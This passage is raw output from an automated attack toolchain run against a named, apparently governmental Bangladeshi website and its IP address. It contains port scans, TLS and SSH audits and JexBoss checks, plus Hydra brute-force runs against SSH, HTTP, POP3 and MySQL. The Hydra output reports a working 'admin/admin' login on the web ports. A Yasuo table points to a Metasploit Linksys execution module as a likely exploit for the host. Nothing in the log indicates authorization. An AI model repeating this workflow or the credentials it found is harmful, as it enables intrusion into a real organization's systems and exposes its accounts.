1506. AECDH-DES-CBC3-SHA timeout - timed out
1507. ADH-DES-CBC3-SHA timeout - timed out
1508. ADH-DES-CBC-SHA timeout - timed out
1509.  
1510.  
1511.  
1512. SCAN COMPLETED IN 58.03 S
1513. -------------------------
1514. #######################################################################################################################################
1515.  
1516.  
1517. * --- JexBoss: Jboss verify and EXploitation Tool --- *
1518. | * And others Java Deserialization Vulnerabilities * |
1519. | |
1520. | @author: João Filho Matos Figueiredo |
1521. | @contact: joaomatosf@gmail.com |
1522. | |
1523. | @update: https://github.com/joaomatosf/jexboss |
1524. #______________________________________________________#
1525.  
1526. @version: 1.2.4
1527.  
1528. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
1529.  
1530.  
1531. ** Checking Host: https://www.bpc.gov.bd:8443 **
1532.  
1533. [*] Checking admin-console: [ OK ]
1534. [*] Checking Struts2: [ OK ]
1535. [*] Checking Servlet Deserialization: [ OK ]
1536. [*] Checking Application Deserialization: [ OK ]
1537. [*] Checking Jenkins: [ OK ]
1538. [*] Checking web-console: [ OK ]
1539. [*] Checking jmx-console: [ OK ]
1540. [*] Checking JMXInvokerServlet: [ OK ]
1541.  
1542.  
1543. * Results:
1544. The server is not vulnerable to bugs tested ... :D
1545.  
1546. * Info: review, suggestions, updates, etc:
1547. https://github.com/joaomatosf/jexboss
1548.  
1549. * DONATE: Please consider making a donation to help improve this tool,
1550. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
1551.  
1552. ######################################################################################################################################
1553.  
1554. I, [2018-11-23T00:42:52.764399 #18378] INFO -- : Initiating port scan
1555. I, [2018-11-23T00:43:53.632428 #18378] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-23_00-42-52.xml
1556. I, [2018-11-23T00:43:53.633772 #18378] INFO -- : Discovered open port: 173.237.136.21:80
1557. I, [2018-11-23T00:43:54.601472 #18378] INFO -- : Discovered open port: 173.237.136.21:443
1558. I, [2018-11-23T00:43:56.407608 #18378] INFO -- : Discovered open port: 173.237.136.21:465
1559. I, [2018-11-23T00:43:57.796636 #18378] INFO -- : Discovered open port: 173.237.136.21:993
1560. I, [2018-11-23T00:44:00.018622 #18378] INFO -- : Discovered open port: 173.237.136.21:995
1561. I, [2018-11-23T00:44:02.253780 #18378] INFO -- : Discovered open port: 173.237.136.21:8443
1562. I, [2018-11-23T00:44:04.043590 #18378] INFO -- : <<<Enumerating vulnerable applications>>>
1563.  
1564.  
1565. --------------------------------------------------------
1566. <<<Yasuo discovered following vulnerable applications>>>
1567. --------------------------------------------------------
1568. +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
1569. | App Name | URL to Application | Potential Exploit | Username | Password |
1570. +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
1571. | Linksys WRT54GL | https://173.237.136.21:443/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
1572. | Linksys WRT54GL | http://173.237.136.21:80/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
1573. +-----------------+--------------------------------------+------------------------------------------------+----------+----------+
1574. ######################################################################################################################################
1575. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:48 EST
1576. Nmap scan report for www.bpc.gov.bd (173.237.136.21)
1577. Host is up (0.20s latency).
1578. Not shown: 16 closed ports, 1 filtered port
1579. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1580. PORT STATE SERVICE
1581. 21/tcp open ftp
1582. 22/tcp open ssh
1583. 53/tcp open domain
1584. 80/tcp open http
1585. 110/tcp open pop3
1586. 443/tcp open https
1587. 993/tcp open imaps
1588. 3306/tcp open mysql
1589. 8080/tcp open http-proxy
1590. #######################################################################################################################################
1591. [STATUS] 5.53 tries/min, 210 tries in 00:38h, 18 to do in 00:04h, 1 active
1592. 1 of 1 target completed, 0 valid passwords found
1593. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:27:09
1594. + -- --=[Port 22 opened... running tests...
1595. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1596.  
1597. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:27:09
1598. [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
1599. [DATA] attacking ssh://www.bpc.gov.bd:22/
1600. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1601.  
1602. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:27:10
1603. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
1604. [DATA] attacking ssh://www.bpc.gov.bd:22/
1605. + -- --=[Port 23 closed... skipping.
1606. + -- --=[Port 25 closed... skipping.
1607. + -- --=[Port 80 opened... running tests...
1608. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1609.  
1610. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 01:27:10
1611. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
1612. [DATA] attacking http-get://www.bpc.gov.bd:80//
1613. [80][http-get] host: www.bpc.gov.bd login: admin password: admin
1614. [STATUS] attack finished for www.bpc.gov.bd (valid pair found)
1615. 1 of 1 target successfully completed, 1 valid password found
1616. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 01:27:14
1617. + -- --=[Port 110 opened... running tests...
1618. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1619.  
1620. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1621.  
1622. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 08:28:23
1623. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
1624. [DATA] attacking http-gets://www.bpc.gov.bd:443//
1625. [443][http-get] host: www.bpc.gov.bd login: admin password: admin
1626. [STATUS] attack finished for www.bpc.gov.bd (valid pair found)
1627. 1 of 1 target successfully completed, 1 valid password found
1628. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 08:28:27
1629. + -- --=[Port 445 closed... skipping.
1630. + -- --=[Port 512 closed... skipping.
1631. + -- --=[Port 513 closed... skipping.
1632. + -- --=[Port 514 closed... skipping.
1633. + -- --=[Port 993 opened... running tests...
1634. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1635.  
1636. 1 of 1 target completed, 0 valid passwords found
1637. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 16:18:43
1638. + -- --=[Port 1433 closed... skipping.
1639. + -- --=[Port 1521 closed... skipping.
1640. + -- --=[Port 3306 opened... running tests...
1641. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1642.  
1643. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 16:18:43
1644. [DATA] max 1 task per 1 server, overall 1 task, 78 login tries, ~78 tries per task
1645. [DATA] attacking mysql://www.bpc.gov.bd:3306/
1646. [STATUS] 49.00 tries/min, 49 tries in 00:01h, 29 to do in 00:01h, 1 active
1647. 1 of 1 target completed, 0 valid passwords found
1648. Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-23 16:19:45
1649. + -- --=[Port 3389 closed... skipping.
1650. + -- --=[Port 5432 closed... skipping.
1651. + -- --=[Port 5900 closed... skipping.
1652. + -- --=[Port 5901 closed... skipping.
1653. + -- --=[Port 8000 closed... skipping.
1654. + -- --=[Port 8080 opened... running tests...
1655. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1656.  
1657. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-23 16:19:45
1658. + -- --=[Port 8100 closed... skipping.
1659. + -- --=[Port 6667 closed... skipping.
1660. #######################################################################################################################################
1661. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-22 23:50 EST
1662. Nmap scan report for 173.237.136.21
1663. Host is up (0.22s latency).
1664. Not shown: 459 closed ports, 3 filtered ports
1665. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1666. PORT STATE SERVICE
1667. 21/tcp open ftp
1668. 22/tcp open ssh
1669. 53/tcp open domain
1670. 80/tcp open http
1671. 110/tcp open pop3
1672. 143/tcp open imap
1673. 443/tcp open https
1674. 465/tcp open smtps
1675. 587/tcp open submission
1676. 993/tcp open imaps
1677. 995/tcp open pop3s
1678. 3306/tcp open mysql
1679. 8080/tcp open http-proxy
1680. 8443/tcp open https-alt
1681. #######################################################################################################################################
1682. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-22 23:51 EST
1683. Nmap scan report for 173.237.136.21
1684. Host is up (0.20s latency).
1685. Not shown: 11 closed ports, 2 filtered ports
1686. PORT STATE SERVICE
1687. 53/udp open domain
1688.  
1689. Nmap done: 1 IP address (1 host up) scanned in 23.12 seconds
1690. ######################################################################################################################################
1691. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-22 23:51 EST
1692. Nmap scan report for 173.237.136.21
1693. Host is up (0.22s latency).
1694.  
1695. PORT STATE SERVICE VERSION
1696. 21/tcp open ftp Pure-FTPd
1697. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1698. Device type: WAP
1699. Running: Linux 2.4.X|2.6.X
1700. OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22
1701. OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22)
1702. Network Distance: 12 hops
1703.  
1704. TRACEROUTE (using port 21/tcp)
1705. HOP RTT ADDRESS
1706. 1 102.94 ms 10.251.200.1
1707. 2 103.36 ms 185.94.189.129
1708. 3 104.94 ms 185.206.226.109
1709. 4 105.12 ms 213.248.70.225
1710. 5 218.06 ms prs-bb4-link.telia.net (62.115.138.138)
1711. 6 222.38 ms 80.91.251.243
1712. 7 204.20 ms atl-b22-link.telia.net (62.115.125.191)
1713. 8 217.44 ms 80.91.246.75
1714. 9 222.00 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
1715. 10 217.75 ms 207.210.229.6
1716. 11 219.03 ms 174.136.31.214
1717. 12 ... 30
1718. ######################################################################################################################################
1719. # general
1720. (gen) banner: SSH-2.0-OpenSSH_5.3
1721. (gen) software: OpenSSH 5.3
1722. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+
1723. (gen) compression: enabled (zlib@openssh.com)
1724.  
1725. # key exchange algorithms
1726. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
1727. `- [info] available since OpenSSH 4.4
1728.  
1729. # host-key algorithms
1730. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
1731. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
1732. `- [warn] using small 1024-bit modulus
1733. `- [warn] using weak random number generator could reveal the key
1734. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1735.  
1736. # encryption algorithms (ciphers)
1737. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1738. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
1739. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1740.  
1741. # message authentication code algorithms
1742. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
1743. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1744. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
1745. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1746. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1747. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1748. `- [warn] using encrypt-and-MAC mode
1749. `- [info] available since OpenSSH 2.5.0
1750. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1751. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1752. `- [warn] using encrypt-and-MAC mode
1753. `- [info] available since OpenSSH 2.1.0
1754.  
1755. # algorithm recommendations (for OpenSSH 5.3)
1756. (rec) -ssh-dss -- key algorithm to remove
1757. (rec) -hmac-ripemd160 -- mac algorithm to remove
1758. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
1759. #######################################################################################################################################
1760. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:02 EST
1761. Nmap scan report for 173.237.136.21
1762. Host is up (0.22s latency).
1763.  
1764. PORT STATE SERVICE VERSION
1765. 22/tcp closed ssh
1766. Too many fingerprints match this host to give specific OS details
1767. Network Distance: 12 hops
1768.  
1769. TRACEROUTE (using port 22/tcp)
1770. HOP RTT ADDRESS
1771. 1 103.33 ms 10.251.200.1
1772. 2 110.54 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
1773. 3 103.47 ms 185.206.226.109
1774. 4 103.50 ms 213.248.70.225
1775. 5 219.92 ms prs-bb3-link.telia.net (62.115.138.132)
1776. 6 220.92 ms 80.91.251.243
1777. 7 203.39 ms atl-b22-link.telia.net (62.115.125.191)
1778. 8 219.92 ms 80.91.246.75
1779. 9 220.49 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
1780. 10 220.48 ms 207.210.229.6
1781. 11 219.97 ms 174.136.31.218
1782. 12 220.15 ms 173.237.136.21
1783. #######################################################################################################################################
1784. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:03 EST
1785. Nmap scan report for 173.237.136.21
1786. Host is up (0.22s latency).
1787.  
1788. PORT STATE SERVICE VERSION
1789. 53/tcp open domain?
1790. |_dns-fuzz: Server didn't response to our probe, can't fuzz
1791. |_dns-nsec-enum: Can't determine domain for host 173.237.136.21; use dns-nsec-enum.domains script arg.
1792. |_dns-nsec3-enum: Can't determine domain for host 173.237.136.21; use dns-nsec3-enum.domains script arg.
1793. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1794. Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 2.6.18 - 2.6.22 (94%), Linux 4.4 (93%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Android 4.1.1 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%), Linux 3.2 - 4.9 (90%)
1795. No exact OS matches for host (test conditions non-ideal).
1796. Network Distance: 12 hops
1797.  
1798. Host script results:
1799. | dns-blacklist:
1800. | SPAM
1801. |_ list.quorum.to - FAIL
1802. |_dns-brute: Can't guess domain of "173.237.136.21"; use dns-brute.domain script argument.
1803.  
1804. TRACEROUTE (using port 53/tcp)
1805. HOP RTT ADDRESS
1806. 1 103.29 ms 10.251.200.1
1807. 2 103.35 ms vlan200.bb1.par1.fr.m247.com (185.94.189.129)
1808. 3 105.73 ms 185.206.226.109
1809. 4 105.76 ms 213.248.70.225
1810. 5 222.25 ms prs-bb3-link.telia.net (62.115.138.132)
1811. 6 223.23 ms 80.91.251.243
1812. 7 201.37 ms atl-b22-link.telia.net (62.115.125.128)
1813. 8 222.03 ms 80.91.246.75
1814. 9 218.83 ms tierpoint-ic-310923-dls-b21.c.telia.net (213.248.71.138)
1815. 10 218.58 ms 207.210.229.6
1816. 11 218.27 ms 174.136.31.218
1817. 12 218.56 ms 173.237.136.21
1818. #######################################################################################################################################
1819. ^ ^
1820. _ __ _ ____ _ __ _ _ ____
1821. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1822. | V V // o // _/ | V V // 0 // 0 // _/
1823. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1824. <
1825. ...'
1826.  
1827. WAFW00F - Web Application Firewall Detection Tool
1828.  
1829. By Sandro Gauci && Wendel G. Henrique
1830.  
1831. Checking http://173.237.136.21
1832. Generic Detection results:
1833. No WAF detected by the generic detection
1834. Number of requests: 14
1835. #######################################################################################################################################
1836. http://173.237.136.21 [200 OK] Country[UNITED STATES][US], IP[173.237.136.21], Meta-Refresh-Redirect[/cgi-sys/defaultwebpage.cgi], cPanel
1837. http://173.237.136.21/cgi-sys/defaultwebpage.cgi [200 OK] Country[UNITED STATES][US], Email[webmaster@173.237.136.21], HTML5, IP[173.237.136.21], Title[Default Web Site Page]
1838. #######################################################################################################################################
1839.  
1840. wig - WebApp Information Gatherer
1841.  
1842.  
1843. Scanning http://173.237.136.21...
1844. ___________________ SITE INFO ___________________
1845. IP Title
1846. 173.237.136.21
1847.  
1848. ____________________ VERSION ____________________
1849. Name Versions Type
1850. PHP 5.6.35 Platform
1851.  
1852. __________________ INTERESTING __________________
1853. URL Note Type
1854. /phpinfo.php PHP info file Interesting
1855.  
1856. _________________________________________________
1857. Time: 1.1 sec Urls: 598 Fingerprints: 40401
1858. #######################################################################################################################################
1859. HTTP/1.1 200 OK
1860. Date: Fri, 23 Nov 2018 05:05:29 GMT
1861. Content-Type: text/html
1862. Last-Modified: Thu, 20 Oct 2016 16:22:47 GMT
1863. Content-Encoding: gzip
1864. Connection: keep-alive
1865. #######################################################################################################################################
1866. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:05 EST
1867. Nmap scan report for 173.237.136.21
1868. Host is up (0.13s latency).
1869.  
1870. PORT STATE SERVICE VERSION
1871. 110/tcp open pop3 Dovecot pop3d
1872. | pop3-brute:
1873. | Accounts: No valid accounts found
1874. |_ Statistics: Performed 205 guesses in 181 seconds, average tps: 1.0
1875. |_pop3-capabilities: USER PIPELINING UIDL CAPA STLS AUTH-RESP-CODE TOP RESP-CODES SASL(PLAIN LOGIN)
1876. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1877. Aggressive OS guesses: Tomato 1.27 - 1.28 (Linux 2.4.20) (94%), Linux 3.11 - 4.1 (94%), Linux 4.4 (94%), Linux 2.6.18 - 2.6.22 (94%), MikroTik RouterOS 6.15 (Linux 3.3.5) (93%), HP P2000 G3 NAS device (92%), Android 4.1.1 (90%), Linux 3.10 - 3.12 (90%), Linux 3.10 - 4.11 (90%), Linux 3.16 - 4.6 (90%)
1878. No exact OS matches for host (test conditions non-ideal).
1879. Network Distance: 1 hop
1880.  
1881. TRACEROUTE (using port 80/tcp)
1882. HOP RTT ADDRESS
1883. 1 106.31 ms 173.237.136.21
1884. #######################################################################################################################################
1885.  
1886. ^ ^
1887. _ __ _ ____ _ __ _ _ ____
1888. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1889. | V V // o // _/ | V V // 0 // 0 // _/
1890. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1891. <
1892. ...'
1893.  
1894. WAFW00F - Web Application Firewall Detection Tool
1895.  
1896. By Sandro Gauci && Wendel G. Henrique
1897.  
1898. Checking https://173.237.136.21
1899. Generic Detection results:
1900. No WAF detected by the generic detection
1901. Number of requests: 14
1902. #######################################################################################################################################
1903. https://173.237.136.21 [200 OK] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Meta-Refresh-Redirect[/cgi-sys/defaultwebpage.cgi], cPanel, nginx[1.14.0]
1904. https://173.237.136.21/cgi-sys/defaultwebpage.cgi [200 OK] Country[UNITED STATES][US], Email[webmaster@173.237.136.21], HTML5, HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[Default Web Site Page], nginx[1.14.0]
1905. #######################################################################################################################################
1906.  
1907.  
1908. AVAILABLE PLUGINS
1909. -----------------
1910.  
1911. PluginHSTS
1912. PluginOpenSSLCipherSuites
1913. PluginSessionResumption
1914. PluginSessionRenegotiation
1915. PluginChromeSha1Deprecation
1916. PluginCertInfo
1917. PluginHeartbleed
1918. PluginCompression
1919.  
1920.  
1921.  
1922. CHECKING HOST(S) AVAILABILITY
1923. -----------------------------
1924.  
1925. 173.237.136.21:443 => 173.237.136.21:443
1926.  
1927.  
1928.  
1929. SCAN RESULTS FOR 173.237.136.21:443 - 173.237.136.21:443
1930. --------------------------------------------------------
1931.  
1932. * Deflate Compression:
1933. OK - Compression disabled
1934.  
1935. * Session Renegotiation:
1936. Client-initiated Renegotiations: OK - Rejected
1937. Secure Renegotiation: OK - Supported
1938.  
1939. * Certificate - Content:
1940. SHA1 Fingerprint: 89301ed82100fbd764e30901b2f08d1881e409c8
1941. Common Name: *.myserverhosts.com
1942. Issuer: COMODO RSA Domain Validation Secure Server CA
1943. Serial Number: 64D366D3D5C5981790DD46ECBB74CC0A
1944. Not Before: Jun 8 00:00:00 2018 GMT
1945. Not After: Jun 8 23:59:59 2020 GMT
1946. Signature Algorithm: sha256WithRSAEncryption
1947. Public Key Algorithm: rsaEncryption
1948. Key Size: 2048 bit
1949. Exponent: 65537 (0x10001)
1950. X509v3 Subject Alternative Name: {'DNS': ['*.myserverhosts.com', 'myserverhosts.com']}
1951.  
1952. * Certificate - Trust:
1953. Hostname Validation: FAILED - Certificate does NOT match 173.237.136.21
1954. Google CA Store (09/2015): OK - Certificate is trusted
1955. Java 6 CA Store (Update 65): OK - Certificate is trusted
1956. Microsoft CA Store (09/2015): OK - Certificate is trusted
1957. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
1958. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
1959. Certificate Chain Received: ['*.myserverhosts.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
1960.  
1961. * Certificate - OCSP Stapling:
1962. NOT SUPPORTED - Server did not send back an OCSP response.
1963.  
1964. * Session Resumption:
1965. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1966. With TLS Session Tickets: OK - Supported
1967.  
1968. * SSLV2 Cipher Suites:
1969. Server rejected all cipher suites.
1970.  
1971. * SSLV3 Cipher Suites:
1972. Undefined - An unexpected error happened:
1973. PSK-3DES-EDE-CBC-SHA timeout - timed out
1974. EXP-RC2-CBC-MD5 timeout - timed out
1975. EXP-EDH-RSA-DES-CBC-SHA timeout - timed out
1976. EXP-EDH-DSS-DES-CBC-SHA timeout - timed out
1977. EXP-DES-CBC-SHA timeout - timed out
1978. EXP-ADH-RC4-MD5 timeout - timed out
1979. EXP-ADH-DES-CBC-SHA timeout - timed out
1980. EDH-RSA-DES-CBC-SHA timeout - timed out
1981. EDH-DSS-DES-CBC-SHA timeout - timed out
1982. ECDHE-RSA-NULL-SHA timeout - timed out
1983. ECDHE-ECDSA-NULL-SHA timeout - timed out
1984. ECDH-ECDSA-NULL-SHA timeout - timed out
1985. ECDH-ECDSA-DES-CBC3-SHA timeout - timed out
1986. DH-RSA-DES-CBC-SHA timeout - timed out
1987. DH-DSS-DES-CBC-SHA timeout - timed out
1988. DES-CBC3-SHA timeout - timed out
1989. DES-CBC-SHA timeout - timed out
1990. AECDH-NULL-SHA timeout - timed out
1991. AECDH-DES-CBC3-SHA timeout - timed out
1992. ADH-DES-CBC3-SHA timeout - timed out
1993. ADH-DES-CBC-SHA timeout - timed out
1994.  
1995.  
1996.  
1997. SCAN COMPLETED IN 51.14 S
1998. -------------------------
1999. Version: 1.11.12-static
2000. OpenSSL 1.0.2-chacha (1.0.2g-dev)
2001.  
2002. Connected to 173.237.136.21
2003.  
2004. Testing SSL server 173.237.136.21 on port 443 using SNI name 173.237.136.21
2005.  
2006. TLS Fallback SCSV:
2007. Server supports TLS Fallback SCSV
2008.  
2009. TLS renegotiation:
2010. Secure session renegotiation supported
2011.  
2012. TLS Compression:
2013. Compression disabled
2014.  
2015. Heartbleed:
2016. TLS 1.2 not vulnerable to heartbleed
2017. TLS 1.1 not vulnerable to heartbleed
2018. TLS 1.0 not vulnerable to heartbleed
2019.  
2020. Supported Server Cipher(s):
2021. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
2022. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
2023. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2024. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
2025. Accepted TLSv1.2 256 bits AES256-SHA256
2026. Accepted TLSv1.2 256 bits AES256-SHA
2027. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
2028. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
2029. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2030. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
2031. Accepted TLSv1.2 128 bits AES128-SHA256
2032. Accepted TLSv1.2 128 bits AES128-SHA
2033. Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2034. Accepted TLSv1.2 112 bits DES-CBC3-SHA
2035. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2036. Accepted TLSv1.1 256 bits AES256-SHA
2037. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2038. Accepted TLSv1.1 128 bits AES128-SHA
2039. Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2040. Accepted TLSv1.1 112 bits DES-CBC3-SHA
2041. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2042. Accepted TLSv1.0 256 bits AES256-SHA
2043. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2044. Accepted TLSv1.0 128 bits AES128-SHA
2045. Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2046. Accepted TLSv1.0 112 bits DES-CBC3-SHA
2047.  
2048. SSL Certificate:
2049. Signature Algorithm: sha256WithRSAEncryption
2050. RSA Key Strength: 2048
2051.  
2052. Subject: *.myserverhosts.com
2053. Altnames: DNS:*.myserverhosts.com, DNS:myserverhosts.com
2054. Issuer: COMODO RSA Domain Validation Secure Server CA
2055.  
2056. Not valid before: Jun 8 00:00:00 2018 GMT
2057. Not valid after: Jun 8 23:59:59 2020 GMT
2058.  
2059. + -- --=[Port 8080 opened... running tests...
2060.  
2061. ^ ^
2062. _ __ _ ____ _ __ _ _ ____
2063. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
2064. | V V // o // _/ | V V // 0 // 0 // _/
2065. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
2066. <
2067. ...'
2068.  
2069. WAFW00F - Web Application Firewall Detection Tool
2070.  
2071. By Sandro Gauci && Wendel G. Henrique
2072.  
2073. Checking http://173.237.136.21:8080
2074. Generic Detection results:
2075. No WAF detected by the generic detection
2076. Number of requests: 14
2077.  
2078. http://173.237.136.21:8080 [200 OK] Country[UNITED STATES][US], HTTPServer[nginx/1.14.0], IP[173.237.136.21], Meta-Refresh-Redirect[/cgi-sys/defaultwebpage.cgi], cPanel, nginx[1.14.0]
2079. http://173.237.136.21:8080/cgi-sys/defaultwebpage.cgi [200 OK] Country[UNITED STATES][US], Email[webmaster@173.237.136.21], HTML5, HTTPServer[nginx/1.14.0], IP[173.237.136.21], Title[Default Web Site Page], nginx[1.14.0]
2080.  
2081. Version: 1.11.12-static
2082. OpenSSL 1.0.2-chacha (1.0.2g-dev)
2083.  
2084. Connected to 173.237.136.21
2085.  
2086. Testing SSL server 173.237.136.21 on port 8080 using SNI name 173.237.136.21
2087.  
2088. TLS Fallback SCSV:
2089. Server does not support TLS Fallback SCSV
2090.  
2091. TLS renegotiation:
2092. Session renegotiation not supported
2093.  
2094. TLS Compression:
2095. Compression disabled
2096.  
2097. Heartbleed:
2098. TLS 1.2 not vulnerable to heartbleed
2099. TLS 1.1 not vulnerable to heartbleed
2100. TLS 1.0 not vulnerable to heartbleed
2101. #######################################################################################################################################
2102.  
2103.  
2104.  
2105. * --- JexBoss: Jboss verify and EXploitation Tool --- *
2106. | * And others Java Deserialization Vulnerabilities * |
2107. | |
2108. | @author: João Filho Matos Figueiredo |
2109. | @contact: joaomatosf@gmail.com |
2110. | |
2111. | @update: https://github.com/joaomatosf/jexboss |
2112. #______________________________________________________#
2113.  
2114. @version: 1.2.4
2115.  
2116. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
2117.  
2118.  
2119. ** Checking Host: http://173.237.136.21:8080 **
2120.  
2121. [*] Checking admin-console: [ OK ]
2122. [*] Checking Struts2: [ OK ]
2123. [*] Checking Servlet Deserialization: [ OK ]
2124. [*] Checking Application Deserialization: [ OK ]
2125. [*] Checking Jenkins: [ OK ]
2126. [*] Checking web-console: [ OK ]
2127. [*] Checking jmx-console: [ OK ]
2128. [*] Checking JMXInvokerServlet: [ OK ]
2129.  
2130.  
2131. * Results:
2132. The server is not vulnerable to bugs tested ... :D
2133.  
2134. * Info: review, suggestions, updates, etc:
2135. https://github.com/joaomatosf/jexboss
2136.  
2137. * DONATE: Please consider making a donation to help improve this tool,
2138. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
2139.  
2140. + -- --=[Port 8180 closed... skipping.
2141. + -- --=[Port 8443 opened... running tests...
2142.  
2143. ^ ^
2144. _ __ _ ____ _ __ _ _ ____
2145. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
2146. | V V // o // _/ | V V // 0 // 0 // _/
2147. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
2148. <
2149. ...'
2150.  
2151. WAFW00F - Web Application Firewall Detection Tool
2152.  
